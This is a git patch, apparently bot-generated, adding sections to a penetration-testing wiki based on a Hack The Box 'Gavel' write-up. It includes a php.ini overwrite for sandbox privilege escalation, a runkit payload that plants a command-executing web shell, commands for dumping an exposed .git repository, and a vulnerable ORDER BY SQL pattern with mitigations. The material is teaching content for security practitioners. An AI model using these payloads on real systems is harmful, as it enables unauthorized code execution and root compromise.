From 11320928e3e88dcf9ba73e43fc92b3a011babaa2 Mon Sep 17 00:00:00 2001
From: HackTricks News Bot <bot@hacktricks.xyz>
Date: Sat, 14 Mar 2026 18:40:35 +0000
Subject: [PATCH] Add content from: HTB: Gavel

---
 .../privilege-escalation/write-to-root.md     | 21 +++++++++++++--
 src/pentesting-web/command-injection.md       | 19 +++++++++++++
 src/pentesting-web/file-inclusion/README.md   | 27 ++++++++++++++++++-
 src/pentesting-web/sql-injection/README.md    | 24 +++++++++++++++++
 4 files changed, 88 insertions(+), 3 deletions(-)

diff --git a/src/linux-hardening/privilege-escalation/write-to-root.md b/src/linux-hardening/privilege-escalation/write-to-root.md
index c4c06fb42a2..3f742390e02 100644
--- a/src/linux-hardening/privilege-escalation/write-to-root.md
+++ b/src/linux-hardening/privilege-escalation/write-to-root.md
@@ -43,6 +43,24 @@ TODO
 
 TODO
 
+### Overwrite a restrictive `php.ini` used by a privileged PHP sandbox
+
+Some custom daemons validate user-supplied PHP by running `php` with a **restricted `php.ini`** (for example, `disable_functions=exec,system,...`). If the sandboxed code still has **any write primitive** (like `file_put_contents`) and you can reach the **exact `php.ini` path** used by the daemon, you can **overwrite that config** to lift restrictions and then submit a second payload that runs with elevated privileges.
+
+Typical flow:
+
+1. First payload overwrites the sandbox config.
+2. Second payload executes code now that dangerous functions are re-enabled.
+
+Minimal example (replace the path used by the daemon):
+
+```php
+<?php
+file_put_contents('/path/to/sandbox/php.ini', "disable_functions=\n");
+```
+
+If the daemon runs as root (or validates with root-owned paths), the second execution yields a root context. This is essentially **privilege escalation via config overwrite** when the sandboxed runtime can still write files.
+
 ### binfmt_misc
 
 The file located in `/proc/sys/fs/binfmt_misc` indicates which binary should execute whic type of files. TODO: check the requirements to abuse this to execute a rev shell when a common file type is open.
@@ -91,8 +109,7 @@ chmod +x server-command
 ## References
 
 - [HTB Bamboo – hijacking a root-executed script in a user-writable PaperCut directory](https://0xdf.gitlab.io/2026/02/03/htb-bamboo.html)
+- [HTB: Gavel](https://0xdf.gitlab.io/2026/03/14/htb-gavel.html)
 
 {{#include ../../banners/hacktricks-training.md}}
 
-
-
diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md
index 13d7d7532b2..41a11880d6a 100644
--- a/src/pentesting-web/command-injection.md
+++ b/src/pentesting-web/command-injection.md
@@ -32,6 +32,24 @@ ls${LS_COLORS:10:1}${IFS}id # Might be useful
 < /etc/passwd #Try to send some input to the command
 ```
 
+### PHP rule engines with `runkit` enabled
+
+Some applications implement admin-only “rule engines” by **executing attacker-supplied PHP**. If the environment enables the `runkit` extension, an attacker can redefine or inject functions at runtime and escalate a logic-only rule editor into **full PHP RCE**.
+
+Indicators:
+
+- Admin UI accepts PHP-like “rules” that are evaluated.
+- `runkit` / `runkit7` is loaded (`phpinfo()` or `extension_loaded('runkit')`).
+
+Abuse example (redefine a function used by the rules to execute a command):
+
+```php
+<?php
+runkit_function_redefine('checkBid', '$bid', 'system($_GET["cmd"]); return true;');
+```
+
+If the rule content is stored and evaluated later, it becomes a persistent RCE primitive within the web context.
+
 ### **Limition** Bypasses
 
 If you are trying to execute **arbitrary commands inside a linux machine** you will be interested to read about this **Bypasses:**
@@ -266,6 +284,7 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject
 - [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/)
 - [When WebSockets Lead to RCE in CurseForge](https://elliott.diy/blog/curseforge/)
 - [PaperCut NG/MF SetupCompleted auth bypass → print scripting RCE](https://0xdf.gitlab.io/2026/02/03/htb-bamboo.html)
+- [HTB: Gavel](https://0xdf.gitlab.io/2026/03/14/htb-gavel.html)
 - [CVE-2023-27350.py (auth bypass + print scripting automation)](https://github.com/horizon3ai/CVE-2023-27350/blob/main/CVE-2023-27350.py)
 - [Unit 42 – Bash arithmetic expansion RCE in Ivanti RewriteMap scripts](https://unit42.paloaltonetworks.com/ivanti-cve-2026-1281-cve-2026-1340/)
 
diff --git a/src/pentesting-web/file-inclusion/README.md b/src/pentesting-web/file-inclusion/README.md
index 719bd0a628f..54789064d34 100644
--- a/src/pentesting-web/file-inclusion/README.md
+++ b/src/pentesting-web/file-inclusion/README.md
@@ -198,6 +198,31 @@ If for some reason **`allow_url_include`** is **On**, but PHP is **filtering** a
 PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.txt
 ```
 
+## Exposed `.git` Repository (Source Disclosure)
+
+If the web server exposes `/.git/`, an attacker can often **reconstruct the full repository** (including commit history) and audit the application offline. This commonly reveals hidden endpoints, secrets, SQL queries, and admin-only functionality.
+
+Quick checks:
+
+```bash
+curl -s -i http://TARGET/.git/HEAD
+curl -s -i http://TARGET/.git/config
+```
+
+Dump the repository with `git-dumper`:
+
+```bash
+uv tool install git-dumper
+git-dumper http://TARGET/.git/ out/
+```
+
+Then recover the working tree:
+
+```bash
+cd out
+git checkout .
+```
+
 > [!TIP]
 > In the previous code, the final `+.txt` was added because the attacker needed a string that ended in `.txt`, so the string ends with it and after the b64 decode that part will return just junk and the real PHP code will be included (and therefore, executed).
 
@@ -818,10 +843,10 @@ Tune the number of `../` segments until you escape the intended directory, then
 - [When Audits Fail: Four Critical Pre-Auth Vulnerabilities in TRUfusion Enterprise](https://www.rcesecurity.com/2025/09/when-audits-fail-four-critical-pre-auth-vulnerabilities-in-trufusion-enterprise/)
 - [Positive Technologies – Blind Trust: What Is Hidden Behind the Process of Creating Your PDF File?](https://swarm.ptsecurity.com/blind-trust-what-is-hidden-behind-the-process-of-creating-your-pdf-file/)
 - [HTB: Imagery (admin log download traversal + `/proc/self/environ` read)](https://0xdf.gitlab.io/2026/01/24/htb-imagery.html)
+- [HTB: Gavel](https://0xdf.gitlab.io/2026/03/14/htb-gavel.html)
 
 {{#file}}
 EN-Local-File-Inclusion-1.pdf
 {{#endfile}}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/sql-injection/README.md b/src/pentesting-web/sql-injection/README.md
index 53ba19bf313..2bff71793e9 100644
--- a/src/pentesting-web/sql-injection/README.md
+++ b/src/pentesting-web/sql-injection/README.md
@@ -652,6 +652,29 @@ Mitigations:
 - Never concatenate identifiers from user input. Map allowed column names to a fixed allow-list and quote identifiers properly.
 - If dynamic table access is required, restrict to a finite set and resolve server-side from a safe mapping.
 
+### ORDER BY / identifier-based SQLi (PDO limitation)
+
+Prepared statements **cannot bind identifiers** (column or table names). A common unsafe pattern is to take a user-controlled `sort` parameter and build `ORDER BY` using string concatenation, sometimes wrapping the input in backticks to “sanitize” it. This still enables SQLi because the identifier context is attacker-controlled.
+
+Vulnerable pattern:
+
+```php
+$sort = $_POST['sort'];
+$q = "SELECT id,item_name FROM items WHERE user_id=? ORDER BY `$sort`";
+$stmt = $pdo->prepare($q);
+$stmt->execute([$user_id]);
+```
+
+Signals in traffic:
+
+- Sort parameter in **POST** (often `sort=column`), not a fixed allow-list.
+- Changing `sort` breaks the query or alters output ordering.
+
+Mitigation:
+
+- Map user input to a **fixed allow-list** of column names and only interpolate mapped identifiers.
+- Never rely on backticks as “sanitization” for identifiers.
+
 ### WAF bypass suggester tools
 
 
@@ -674,5 +697,6 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/sqli.txt
 ## References
 
 - [https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/](https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/)
+- [HTB: Gavel](https://0xdf.gitlab.io/2026/03/14/htb-gavel.html)
 
 {{#include ../../banners/hacktricks-training.md}}